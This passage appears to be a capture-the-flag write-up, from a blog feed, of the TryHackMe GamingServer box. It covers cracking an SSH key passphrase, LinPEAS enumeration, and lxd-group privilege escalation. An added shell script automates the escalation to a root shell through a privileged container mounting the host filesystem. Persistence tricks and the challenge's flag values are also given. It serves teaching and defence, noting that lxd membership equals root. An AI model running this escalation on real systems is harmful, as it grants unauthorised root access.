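    return info


def ssh_string(b):
    """Encode bytes as an SSH wire 'string'."""
    return struct.pack(">I", len(b)) + b


def build_sample_openssh_key(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Constructed sample: a valid openssh-key-v1 header over a dummy payload."""
    kdfopts = b""
    if kdf == b"bcrypt":
        kdfopts = ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = (OPENSSH_MAGIC + ssh_string(cipher) + ssh_string(kdf) + ssh_string(kdfopts)
            + struct.pack(">I", 1)                 # number of keys
            + ssh_string(b"dummy-public-key")       # public key blob (filler)
            + ssh_string(b"\xaa" * 64))             # stands in for the ciphertext
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % body


# Constructed sample of the legacy format; the base64 body is filler.
SAMPLE_LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0F2B1C3D4E5F60718293A4B5C6D7E8F9

MIIEpAIBAAKCAQEAfillerfillerfillerfillerfillerfillerfiller
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, key in (("openssh", build_sample_openssh_key()), ("legacy", SAMPLE_LEGACY_PEM)):
        print(name, triage_key(key))
```

<p class="wp-block-paragraph">Run it against the real secretKey to see which branch applies. A legacy PEM key with an MD5-derived AES key, as ssh-keygen on an OpenSSH 7.6 host produces by default, is the best case for the attacker: a wordlist the size of dict.lst runs in seconds. A bcrypt-protected key at 16 or more rounds costs several orders of magnitude more per guess, which is the reason to prefer the modern format and a long passphrase for any key that might leak.</p>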



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="667" height="443" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/06/john.png?resize=667%2C443" alt="GamingServer Cracked RSA passphrase" class="wp-image-481" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/john.png?w=667&amp;ssl=1 667w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/john.png?resize=300%2C199&amp;ssl=1 300w" sizes="(max-width: 667px) 100vw, 667px" /><figcaption class="wp-element-caption">RSA passphrase cracked</figcaption></figure>



<p class="wp-block-paragraph">After a couple of minutes, the RSA Private Key passphrase has been cracked, and the passphrase is <code>letmein</code>.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="653" height="484" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/user.txt.png?resize=653%2C484" alt="GamingServer user.txt" class="wp-image-459" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/user.txt.png?w=653&amp;ssl=1 653w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/user.txt.png?resize=300%2C222&amp;ssl=1 300w" sizes="(max-width: 653px) 100vw, 653px" /><figcaption class="wp-element-caption">user.txt</figcaption></figure>



<p class="wp-block-paragraph">With the cracked passphrase, the id_rsa file lets us SSH into the machine as john. That is where we find the user.txt flag <code>a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e</code>.</p>



<h2 class="wp-block-heading">Post Exploitation</h2>



<p class="wp-block-paragraph">The last thing we need to do to complete this challenge is escalate our privileges to root and find the root.txt flag. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="344" height="82" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/sudo-l.png?resize=344%2C82" alt="sudo -l (fail)" class="wp-image-460" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/sudo-l.png?w=344&amp;ssl=1 344w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/sudo-l.png?resize=300%2C72&amp;ssl=1 300w" sizes="(max-width: 344px) 100vw, 344px" /><figcaption class="wp-element-caption">sudo -l</figcaption></figure>



<p class="wp-block-paragraph">Unlike in other privilege escalation challenges, sudo -l does not help here: it prompts for john&#8217;s password, which we never obtained because we authenticated with a key rather than a password.  </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="734" height="171" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/transfer-linpeas.png?resize=734%2C171" alt="uploading linpeas.sh to the server" class="wp-image-463" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/transfer-linpeas.png?w=734&amp;ssl=1 734w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/transfer-linpeas.png?resize=300%2C70&amp;ssl=1 300w" sizes="(max-width: 734px) 100vw, 734px" /><figcaption class="wp-element-caption">uploading linpeas.sh</figcaption></figure>



<p class="wp-block-paragraph">However, we can upload linpeas.sh to the server to <a href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS">search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.</a> LinPEAS (Linux Privilege Escalation Awesome Script) automates the enumeration part of privilege escalation: it checks sudo rules, SUID binaries, capabilities, group memberships, writable files and more, and highlights the findings most likely to lead to root. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="779" height="328" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/linpeas.png?resize=779%2C328" alt="GamingServer linpeas.sh results" class="wp-image-461" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/linpeas.png?w=779&amp;ssl=1 779w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/linpeas.png?resize=300%2C126&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/linpeas.png?resize=768%2C323&amp;ssl=1 768w" sizes="(max-width: 779px) 100vw, 779px" /><figcaption class="wp-element-caption">linpeas.sh results</figcaption></figure>



<p class="wp-block-paragraph">As the legend states, anything highlighted in red/yellow is, in LinPEAS&#8217;s terms, 95% likely to be a privilege escalation vector. The highlighted finding here is that john belongs to the lxd group. LXD, <a href="https://searchitoperations.techtarget.com/definition/LXD-Linux-container-hypervisor">an open-source container management extension for Linux Containers (LXC)</a>, runs its daemon as root, so anyone who can talk to that daemon can effectively act as root. </p>



<p class="wp-block-paragraph">The LinPEAS README states that all of its checks are explained on book.hacktricks.xyz. That <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation">website</a> has a page with instructions for escalating to root when the current user is a member of the lxd/lxc group: the group grants access to the LXD socket, and through it a member can create a privileged container with the host&#8217;s filesystem mounted inside.  </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="476" height="705" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/lxd-priv.png?resize=476%2C705" alt="lxd privilege escalation" class="wp-image-462" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/lxd-priv.png?w=476&amp;ssl=1 476w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/lxd-priv.png?resize=203%2C300&amp;ssl=1 203w" sizes="(max-width: 476px) 100vw, 476px" /><figcaption class="wp-element-caption">lxd privilege escalation</figcaption></figure>



<p class="wp-block-paragraph">The first block of commands, which builds the container image, runs on your own machine; the two files it produces are then uploaded to the victim server.  </p>



<figure class="wp-block-image size-large is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/uploaded.png?resize=747%2C346" alt="uploading lxd.tar.xz and rootfs.squashfs files" class="wp-image-465" style="width:747px;height:346px" width="747" height="346" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/uploaded.png?w=747&amp;ssl=1 747w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/uploaded.png?resize=300%2C139&amp;ssl=1 300w" sizes="(max-width: 747px) 100vw, 747px" /><figcaption class="wp-element-caption">uploading lxd privilege escalation</figcaption></figure>



<p class="wp-block-paragraph">After uploading the lxd.tar.xz and rootfs.squashfs files, we import the image, create a privileged container (so that uid 0 inside the container is uid 0 on the host) with a disk device that mounts the host&#8217;s root filesystem under /mnt, and finally exec a shell in the container, where we are root.</p>
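<p class="wp-block-paragraph">The same sequence written out as a script, as an added example rather than the commands from the original write-up or the HackTricks page shown in the screenshot. It assumes lxd.tar.xz and rootfs.squashfs have already been built on the attacking machine and copied to the current directory on the target; the image alias <code>alpine</code>, the container name <code>privesc</code> and the mount point <code>/mnt/root</code> are choices made here. The group check is kept as a pure function so the precondition LinPEAS flagged can be verified before anything touches LXD.</p>

```sh
#!/bin/sh
# Added example: the lxd group escalation as a script. Assumes lxd.tar.xz and
# rootfs.squashfs (built on the attacking machine) are already in the current
# directory on the target. Image alias "alpine", container name "privesc" and
# mount point /mnt/root are arbitrary choices made here.
set -eu

# in_group NAME LIST: true if NAME appears in the space-separated group list
# LIST (the format printed by `id -nG`). Pure, so it can be tested offline.
in_group() {
    want="$1"
    for g in $2; do
        [ "$g" = "$want" ] && return 0
    done
    return 1
}

# True if the current user can drive LXD through group membership, which is
# the precondition LinPEAS flagged on this box.
lxd_group_member() {
    groups="$(id -nG)"
    in_group lxd "$groups" || in_group lxc "$groups"
}

# lxd_privesc [IMAGE_ALIAS] [CONTAINER_NAME]: import the image, build a
# privileged container with the host's / mounted inside it, and drop into a
# root shell there.
lxd_privesc() {
    img="${1:-alpine}"
    name="${2:-privesc}"
    if ! lxd_group_member; then
        echo "current user is not in the lxd/lxc group" >&2
        return 1
    fi
    # 1. register the uploaded image with the local LXD daemon
    lxc image import lxd.tar.xz rootfs.squashfs --alias "$img"
    # 2. security.privileged=true: uid 0 in the container is uid 0 on the host,
    #    so files on the mounted host disk are read and written as real root
    lxc init "$img" "$name" -c security.privileged=true
    # 3. attach the host's root filesystem as a disk device under /mnt/root
    lxc config device add "$name" host-root disk source=/ path=/mnt/root recursive=true
    # 4. start it and exec a shell; the host's /root is now /mnt/root/root
    lxc start "$name"
    lxc exec "$name" -- /bin/sh
}

# Only run the escalation when invoked as: sh lxd_privesc.sh run [alias] [name]
if [ "${1:-}" = "run" ]; then
    lxd_privesc "${2:-alpine}" "${3:-privesc}"
fi
```

<p class="wp-block-paragraph">Inside the container, everything under /mnt/root is the host&#8217;s filesystem with root access, so beyond reading root.txt an attacker could add an SSH key to /mnt/root/root/.ssh/authorized_keys or set a SUID bit on a copy of bash to keep root on the host itself. The defensive takeaway is that lxd group membership is equivalent to root and should be granted as carefully as sudo.</p>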



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="775" height="175" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/root.png?resize=775%2C175" alt="Privilege escalation" class="wp-image-466" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/root.png?w=775&amp;ssl=1 775w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/root.png?resize=300%2C68&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/root.png?resize=768%2C173&amp;ssl=1 768w" sizes="(max-width: 775px) 100vw, 775px" /><figcaption class="wp-element-caption">becoming root</figcaption></figure>



<p class="wp-block-paragraph">The last thing to do is to find the root.txt flag. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="604" height="260" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/root.txt.png?resize=604%2C260" alt="GamingServer root.txt" class="wp-image-467" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/root.txt.png?w=604&amp;ssl=1 604w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/root.txt.png?resize=300%2C129&amp;ssl=1 300w" sizes="(max-width: 604px) 100vw, 604px" /><figcaption class="wp-element-caption">root.txt</figcaption></figure>



<p class="wp-block-paragraph">It took some time to realise that, inside the container, the host&#8217;s root directory is not at /root but under the /mnt mount point. Looking there reveals that the root.txt flag is <code>2e337b8c9f3aff0c2b3e8d4e6a7c88fc</code>. </p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">In conclusion, this challenge was really fun and seemed more realistic than previous challenges. All the time, people upload their RSA private keys to directories they think nobody will find. Like I said above, it took some time to find the root flag, but it was better than just rushing over to the /root directory and finding it there.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="297" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/Task-1-1024x297.png?resize=1024%2C297" alt="GamingServer solutions" class="wp-image-446" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/Task-1.png?resize=1024%2C297&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/Task-1.png?resize=300%2C87&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/Task-1.png?resize=768%2C223&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/Task-1.png?w=1211&amp;ssl=1 1211w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task 1 Solution</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-gamingserver/">TryHackMe: GamingServer</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-gamingserver/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">92</post-id>	</item>
	</channel>
</rss>
